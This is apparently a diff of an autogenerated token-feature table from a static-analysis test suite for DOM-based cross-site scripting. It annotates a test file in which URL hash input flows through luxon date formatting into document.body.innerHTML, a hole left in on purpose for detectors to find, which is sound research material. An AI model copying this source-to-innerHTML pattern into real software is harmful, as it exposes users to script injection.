autogenerated/Xss/DomBasedXss/dates.js:49:5:49:12 | document | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:49:5:49:17 | document.body | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:49:5:49:17 | document.body | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:49:5:49:17 | document.body | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:49:5:49:17 | document.body | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:49:5:49:17 | document.body | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:49:5:49:27 | documen ... nerHTML | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:49:5:49:27 | documen ... nerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:49:5:49:27 | documen ... nerHTML | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:49:5:49:27 | documen ... nerHTML | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:49:5:49:27 | documen ... nerHTML | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:49:5:49:89 | documen ... aint)}` | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:49:5:49:89 | documen ... aint)}` | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:49:5:49:89 | documen ... aint)}` | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:49:5:49:89 | documen ... aint)}` | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:49:5:49:89 | documen ... aint)}` | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:49:14:49:17 | body | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:49:14:49:17 | body | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:49:14:49:17 | body | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:49:14:49:17 | body | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:49:14:49:17 | body | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:49:19:49:27 | innerHTML | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:49:19:49:27 | innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:49:19:49:27 | innerHTML | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:49:19:49:27 | innerHTML | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:49:19:49:27 | innerHTML | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:49:31:49:89 | `Time i ... aint)}` | assignedToPropName | innerHTML | | autogenerated/Xss/DomBasedXss/dates.js:49:31:49:89 | `Time i ... aint)}` | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | | autogenerated/Xss/DomBasedXss/dates.js:49:31:49:89 | `Time i ... aint)}` | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/dates.js:49:31:49:89 | `Time i ... aint)}` | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | | autogenerated/Xss/DomBasedXss/dates.js:49:31:49:89 | `Time i ... aint)}` | enclosingFunctionName | luxon | | autogenerated/Xss/DomBasedXss/dates.js:49:31:49:89 | `Time i ... aint)}` | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:49:32:49:39 | Time is | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:49:32:49:39 | Time is | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:49:32:49:39 | Time is | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:49:32:49:39 | Time is | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:49:32:49:39 | Time is | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:49:32:49:39 | Time is | stringConcatenatedWith | -endpoint- DateTime().setLocale().toFormat() | +| autogenerated/Xss/DomBasedXss/dates.js:49:42:49:55 | exceptional return of new DateTime() | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:49:42:49:55 | exceptional return of new DateTime() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:49:42:49:55 | exceptional return of new DateTime() | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:49:42:49:55 | exceptional return of new DateTime() | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:49:42:49:55 | exceptional return of new DateTime() | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:49:42:49:55 | new DateTime() | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:49:42:49:55 | new DateTime() | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:49:42:49:55 | new DateTime() | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:49:42:49:55 | new DateTime() | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:49:42:49:55 | new DateTime() | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:49:42:49:65 | new Dat ... tLocale | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:49:42:49:65 | new Dat ... tLocale | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:49:42:49:65 | new Dat ... tLocale | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:49:42:49:65 | new Dat ... tLocale | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:49:42:49:65 | new Dat ... tLocale | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:49:42:49:71 | exceptional return of new Dat ... e('fr') | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:49:42:49:71 | exceptional return of new Dat ... e('fr') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:49:42:49:71 | exceptional return of new Dat ... e('fr') | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:49:42:49:71 | exceptional return of new Dat ... e('fr') | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:49:42:49:71 | exceptional return of new Dat ... e('fr') | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:49:42:49:71 | new Dat ... e('fr') | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:49:42:49:71 | new Dat ... e('fr') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:49:42:49:71 | new Dat ... e('fr') | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:49:42:49:71 | new Dat ... e('fr') | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:49:42:49:71 | new Dat ... e('fr') | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:49:42:49:80 | new Dat ... oFormat | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:49:42:49:80 | new Dat ... oFormat | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:49:42:49:80 | new Dat ... oFormat | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:49:42:49:80 | new Dat ... oFormat | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:49:42:49:80 | new Dat ... oFormat | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:49:42:49:87 | exceptional return of new Dat ... (taint) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:49:42:49:87 | exceptional return of new Dat ... (taint) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:49:42:49:87 | exceptional return of new Dat ... (taint) | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:49:42:49:87 | exceptional return of new Dat ... (taint) | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:49:42:49:87 | exceptional return of new Dat ... (taint) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:49:42:49:87 | new Dat ... (taint) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:49:42:49:87 | new Dat ... (taint) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:49:42:49:87 | new Dat ... (taint) | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:49:42:49:87 | new Dat ... (taint) | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:49:42:49:87 | new Dat ... (taint) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:49:42:49:87 | new Dat ... (taint) | stringConcatenatedWith | 'Time is ' -endpoint- | +| autogenerated/Xss/DomBasedXss/dates.js:49:46:49:53 | DateTime | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:49:46:49:53 | DateTime | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:49:46:49:53 | DateTime | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:49:46:49:53 | DateTime | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:49:46:49:53 | DateTime | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:49:57:49:65 | setLocale | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:49:57:49:65 | setLocale | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:49:57:49:65 | setLocale | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:49:57:49:65 | setLocale | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:49:57:49:65 | setLocale | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:49:67:49:70 | 'fr' | CalleeFlexibleAccessPath | DateTime().setLocale | | autogenerated/Xss/DomBasedXss/dates.js:49:67:49:70 | 'fr' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/dates.js:49:67:49:70 | 'fr' | calleeImports | luxon | @@ -13212,6 +98438,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dates.js:49:67:49:70 | 'fr' | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | | autogenerated/Xss/DomBasedXss/dates.js:49:67:49:70 | 'fr' | enclosingFunctionName | luxon | | autogenerated/Xss/DomBasedXss/dates.js:49:67:49:70 | 'fr' | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:49:73:49:80 | toFormat | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:49:73:49:80 | toFormat | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:49:73:49:80 | toFormat | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:49:73:49:80 | toFormat | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:49:73:49:80 | toFormat | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:49:82:49:86 | taint | CalleeFlexibleAccessPath | DateTime().setLocale().toFormat | | autogenerated/Xss/DomBasedXss/dates.js:49:82:49:86 | taint | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/dates.js:49:82:49:86 | taint | calleeImports | luxon | @@ -13220,12 +98451,104 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dates.js:49:82:49:86 | taint | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | | autogenerated/Xss/DomBasedXss/dates.js:49:82:49:86 | taint | enclosingFunctionName | luxon | | autogenerated/Xss/DomBasedXss/dates.js:49:82:49:86 | taint | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:50:5:50:12 | document | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:50:5:50:12 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:50:5:50:12 | document | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:50:5:50:12 | document | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:50:5:50:12 | document | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:50:5:50:17 | document.body | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:50:5:50:17 | document.body | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:50:5:50:17 | document.body | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:50:5:50:17 | document.body | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:50:5:50:17 | document.body | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:50:5:50:27 | documen ... nerHTML | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:50:5:50:27 | documen ... nerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:50:5:50:27 | documen ... nerHTML | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:50:5:50:27 | documen ... nerHTML | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:50:5:50:27 | documen ... nerHTML | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:50:5:50:104 | documen ... aint)}` | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:50:5:50:104 | documen ... aint)}` | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:50:5:50:104 | documen ... aint)}` | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:50:5:50:104 | documen ... aint)}` | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:50:5:50:104 | documen ... aint)}` | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:50:14:50:17 | body | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:50:14:50:17 | body | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:50:14:50:17 | body | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:50:14:50:17 | body | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:50:14:50:17 | body | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:50:19:50:27 | innerHTML | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:50:19:50:27 | innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:50:19:50:27 | innerHTML | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:50:19:50:27 | innerHTML | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:50:19:50:27 | innerHTML | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:50:31:50:104 | `Time i ... aint)}` | assignedToPropName | innerHTML | | autogenerated/Xss/DomBasedXss/dates.js:50:31:50:104 | `Time i ... aint)}` | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | | autogenerated/Xss/DomBasedXss/dates.js:50:31:50:104 | `Time i ... aint)}` | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/dates.js:50:31:50:104 | `Time i ... aint)}` | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | | autogenerated/Xss/DomBasedXss/dates.js:50:31:50:104 | `Time i ... aint)}` | enclosingFunctionName | luxon | | autogenerated/Xss/DomBasedXss/dates.js:50:31:50:104 | `Time i ... aint)}` | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:50:32:50:39 | Time is | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:50:32:50:39 | Time is | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:50:32:50:39 | Time is | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:50:32:50:39 | Time is | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:50:32:50:39 | Time is | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:50:32:50:39 | Time is | stringConcatenatedWith | -endpoint- DateTime.fromISO().startOf().toFormat() | +| autogenerated/Xss/DomBasedXss/dates.js:50:42:50:49 | DateTime | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:50:42:50:49 | DateTime | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:50:42:50:49 | DateTime | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:50:42:50:49 | DateTime | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:50:42:50:49 | DateTime | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:50:42:50:57 | DateTime.fromISO | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:50:42:50:57 | DateTime.fromISO | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:50:42:50:57 | DateTime.fromISO | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:50:42:50:57 | DateTime.fromISO | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:50:42:50:57 | DateTime.fromISO | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:50:42:50:71 | DateTim ... 01-01") | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:50:42:50:71 | DateTim ... 01-01") | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:50:42:50:71 | DateTim ... 01-01") | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:50:42:50:71 | DateTim ... 01-01") | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:50:42:50:71 | DateTim ... 01-01") | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| 